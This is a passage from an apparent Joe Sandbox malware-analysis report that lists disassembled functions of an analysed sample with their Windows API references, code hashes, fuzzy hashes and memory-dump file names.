Instruction ID: 9352174c1c08aaf3186afa23581280bbf347d7bd44973f867ea3e8269f64482d
Opcode Fuzzy Hash: de294797e349cc1dd044812fcf4fb160f47586452ffd66d93e68bb495b84f8b3
Instruction Fuzzy Hash: 24B1D070A00646AEEF29CF7CC489AB9FBA6FF05304F14825AD469D3685C731D964CB91

Function 0087820B Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00878210

Part of subcall function 0087137E: __EH_prolog.LIBCMT ref: 00871383
Part of subcall function 0087137E: new.LIBCMT ref: 008713FB

Part of subcall function 008719B1: __EH_prolog.LIBCMT ref: 008719B6

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 039427ed5ad34e2913c23f0ad8b0c4be5fb7aab7e9ab685ef48bcb7fce5c7138
Instruction ID: 74c12e3bc2fcdbd650a118eab85dc7f98667defcf7f57cee9faf4e480f8ba849
Opcode Fuzzy Hash: 039427ed5ad34e2913c23f0ad8b0c4be5fb7aab7e9ab685ef48bcb7fce5c7138
Instruction Fuzzy Hash: 7041D3319406589ADF20EB68CC59BEA7369FF50300F0480EAE58EE3157DE749EC8DB21

Function 008821E6 Relevance: 1.6, APIs: 1, Instructions: 90COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008821EB

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e2ebd36664e4b39b9d154f48c35a15a25e1121b8a78a8c995afa00f44b8595cb
Instruction ID: d7c18f3a41fecc5fe60daec1b2a038000c10a3582f395fd7fbbe6d6030670e5d
Opcode Fuzzy Hash: e2ebd36664e4b39b9d154f48c35a15a25e1121b8a78a8c995afa00f44b8595cb
Instruction Fuzzy Hash: 0021F6B1E40615AFDB14FFB8CC41A6BB7A8FB14314F00423AE505EB682E7709D00C7A9

Function 00889485 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0088948A

Part of subcall function 0087137E: __EH_prolog.LIBCMT ref: 00871383
Part of subcall function 0087137E: new.LIBCMT ref: 008713FB

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: fd61407eaf39f08c46a78eb45ada961bc0c7b4fb59c9a85fef2e9fe9bab45cd9
Instruction ID: cdc12fb76d856685cffae1d437deaf34236309ca9e8b727b9213c5e39ce45c46
Opcode Fuzzy Hash: fd61407eaf39f08c46a78eb45ada961bc0c7b4fb59c9a85fef2e9fe9bab45cd9
Instruction Fuzzy Hash: E1217C76C04249AACF15EF98D9419FEB7B4FF19304F1444AAE809F7602D735AE05CB61

Function 008790D0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008790D5

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 8683f9b0fa33d89e09de2cbbb2c32bd9785543a64fdd72a3c885996f630b283b
Instruction ID: db7268eae18d7fea02b33ff47e63e51e85736cdee68082e4efee8f6c30556d60
Opcode Fuzzy Hash: 8683f9b0fa33d89e09de2cbbb2c32bd9785543a64fdd72a3c885996f630b283b
Instruction Fuzzy Hash: 67117073A40429ABCF12AAACDC959DEB736FF48740F448529F819E7219DA34CC1087A1

Function 008796AA Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008796AF

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e1220c964d6a9e984c38d5cf5bf3d6ae8b823d9078723ff86e88ba4a386f27f6
Instruction ID: d69cf9e9b6a2fca93753872c1fa168daa4ef0a69168c047c306cb97f5c6bc973
Opcode Fuzzy Hash: e1220c964d6a9e984c38d5cf5bf3d6ae8b823d9078723ff86e88ba4a386f27f6
Instruction Fuzzy Hash: 2EF049B5A001158FDB18EF6CD40996EBBF9FF88700B0145AEE815E3341DBB09D018BA1

Function 008959FC Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,008923AA,?,0000015D,?,?,?,?,00892F29,000000FF,00000000,?,?), ref: 00895A2E

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c09c96fc0c733d8c62ce324b094605b93f1343df84a25d37f2b93ee6b9b87aa0
Instruction ID: b05a930544069666b17959bc316c34da38b266125b77168899f5e0d93700c443
Opcode Fuzzy Hash: c09c96fc0c733d8c62ce324b094605b93f1343df84a25d37f2b93ee6b9b87aa0
Instruction Fuzzy Hash: 70E06531501E745AEF333B659C46B5A36C8FF513A9F1D0324BC16D6190DB31CC0147A9

Function 00875B35 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00875B3A

Part of subcall function 0087AC66: __EH_prolog.LIBCMT ref: 0087AC6B

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 209f53b682f64e29ae5a19615e31b0acf66045fc0681599cec4bac1c48b782b3
Instruction ID: b46127160b6b594f7462c24d1e4acc81d83302d3d4aa8920d1b11d65f5359ac0
Opcode Fuzzy Hash: 209f53b682f64e29ae5a19615e31b0acf66045fc0681599cec4bac1c48b782b3
Instruction Fuzzy Hash: FC018B30900684DACB06E7A8C0153EDBBE4EF56304F40C0ADA95D93282CBB46B08A763

Function 008794A3 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00879473), ref: 008794BE

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: b04c36e2544f92a8b42f269382fc3c95650c7a48e9d901d01bf188781ba5ccdb
Instruction ID: b2f77f05bb1acf0dfa511571dfea2069e4bdbe2aef0426e592e83f108770fdc5
Opcode Fuzzy Hash: b04c36e2544f92a8b42f269382fc3c95650c7a48e9d901d01bf188781ba5ccdb
Instruction Fuzzy Hash: DAF0B430142B044EDB308A24954879177E8FB12732F04C71ED0EA838E4D361E44A8B11

Function 0087A145 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0087A174

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: cfa833ce9ecfabbda8357ba62ce96d90b5dba3a59f598c3d0cc81cf178d9edd4
Instruction ID: 10bf4c8d6540b2c2d13ec057144660eab9cf8a371a2570416ef9fc14b2917035
Opcode Fuzzy Hash: cfa833ce9ecfabbda8357ba62ce96d90b5dba3a59f598c3d0cc81cf178d9edd4
Instruction Fuzzy Hash: 4DF0B431408780EADA229BB88404BCB7B95BF46331F04CA49F1FE82196C27590859733

Function 00871E8E Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00871E93

Part of subcall function 008718F6: __EH_prolog.LIBCMT ref: 008718FB

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: bbbb5c938c144e52c708cb0746c022d239834102951e288c90881c55e7683ca3
Instruction ID: 67cfa418f0f22420e7c7861a791cbbbd8e8e68c5039884c65cd5406c278a0c34
Opcode Fuzzy Hash: bbbb5c938c144e52c708cb0746c022d239834102951e288c90881c55e7683ca3
Instruction Fuzzy Hash: 2BF0D4B1D102898ECF40EFAC84096EEBBB4FB18300F0441BAD509E7602E73486048BA2

Function 00871E93 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00871E93

Part of subcall function 008718F6: __EH_prolog.LIBCMT ref: 008718FB

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
Instruction ID: 0525880fc22c7767646180ccbff0b54629550b41149092dcf17bf8fd980b6156
Opcode Fuzzy Hash: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
Instruction Fuzzy Hash: F8F098B1C112598ECF41EFACC4496EEBBF5FB18300F1441BAD409E7606E7359604CB91

Function 0087F8F2 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 0087F927

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 406cdf9079d4a0d7202508cc66e8b9e9c5394cd84cf126b65700ae27d2560679
Instruction ID: e8327f303e0b1a269232d87eb2df3cb0ba65fd1d014bed6e5331bd36d596ce36
Opcode Fuzzy Hash: 406cdf9079d4a0d7202508cc66e8b9e9c5394cd84cf126b65700ae27d2560679
Instruction Fuzzy Hash: 03D0C25030461026E621332C6806BBD2907FFCB360F084035B208D26D7AA46886AA6F3

Function 00888B65 Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00888B6B

Part of subcall function 00888924: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00888945

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
Instruction ID: cc689320b8d4c923c009300e08fd902f1db6c225bf4998a7854ecf6160313ade
Opcode Fuzzy Hash: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
Instruction Fuzzy Hash: 25D0A77060010CFBDF607E648C0297DBAD8FB413A0F808135BC04D6150EE72DD106362

Function 0087971A Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,0087964C), ref: 00879726

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: e467b47e7cc866369be8825c27bfadd5386ff6ff54155d9ef1b156a1838d5e15
Instruction ID: f457fc9f432bbedc32976c2d3cc1495e3bd76902f4bb49cea4bf035bf6327528
Opcode Fuzzy Hash: e467b47e7cc866369be8825c27bfadd5386ff6ff54155d9ef1b156a1838d5e15
Instruction Fuzzy Hash: 69D01230031640958E690E385D090666661FB433E6B28DAE4E0ADC40A9C722C843F541

Function 0088BF77 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0088BF9C

Part of subcall function 0088991E: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088992F
Part of subcall function 0088991E: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00889940
Part of subcall function 0088991E: TranslateMessage.USER32(?), ref: 0088994A
Part of subcall function 0088991E: DispatchMessageW.USER32(?), ref: 00889954

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Message$DispatchItemPeekSendTranslate
String ID:
API String ID: 4142818094-0
Opcode ID: 1d49b1955a991cca5a1493271c4d238134880183a1eebc14c8b4497b589c0dc8
Instruction ID: f383032066081704e41c63885fbfb8c1c97dbfca6b4c1ca0a2ba8a8a07c910c7
Opcode Fuzzy Hash: 1d49b1955a991cca5a1493271c4d238134880183a1eebc14c8b4497b589c0dc8
Instruction Fuzzy Hash: 50D09E32144200EAD6112B55CD06F1A7AA2FB8CB04F004958B284740B186629D31EB12

Function 0087DDDA Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE ref: 0087DDE4

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: bcf8d655461e04c4c82b8fa4e6faf462ff56b35ad93b160324fb4fb41bf17d84
Instruction ID: 439bd4a3b751a951f2c93b1ad3bb9e679bd3e90218cbbc2fc96a7cfcfe565751
Opcode Fuzzy Hash: bcf8d655461e04c4c82b8fa4e6faf462ff56b35ad93b160324fb4fb41bf17d84
Instruction Fuzzy Hash: A1D0CA70410622CFE3B09F38E804B82BBE0FF18311B21882E90CAC2628E2708880CF40

Function 0088CD5C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0088CD6E

Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 00dcee143811831a47eb563a91832a4a850b261b50707218225b39b15a9a9c4d
Instruction ID: 37f86bf0d8e26177d13d65e9810b5ffa8349f949cf6a379f3676164d83a0fb48
Opcode Fuzzy Hash: 00dcee143811831a47eb563a91832a4a850b261b50707218225b39b15a9a9c4d
Instruction Fuzzy Hash: EDB012C1259015FD312CB2489E02C37050CF0C2F54330446FF402D4A44A8642C06C133

Function 0088C787 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0088C799

Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 66ae487b981a2bf42bb058f437c009e3e1b940872bb45a3ce1d0c41dc5c46a71
Instruction ID: 3e1ee50201fae8dee9527a6f8d32069f23008f9b1741bf7bdfb7789625022e4c
Opcode Fuzzy Hash: 66ae487b981a2bf42bb058f437c009e3e1b940872bb45a3ce1d0c41dc5c46a71
Instruction Fuzzy Hash: C6B012D1258106BD318CB1481C42C37010DF0C3B24330C41FF801C0A48EAD40C5D8133

Function 0088C7B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0088C799

Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4b2ca973a70a0871031e9dffbc71a363313b976c4e2038d11c6dbc87bc387cdc
Instruction ID: b679c0796fd6fd34804bed0eeb1e0cbf164a61654cc144671b772bfd66e7920b
Opcode Fuzzy Hash: 4b2ca973a70a0871031e9dffbc71a363313b976c4e2038d11c6dbc87bc387cdc
Instruction Fuzzy Hash: 05B012D1258109AD31CCF14D1C02D37010CF0C2B24330C41FF400C0B48E9E40C598337

Function 0088C7C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0088C799

Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
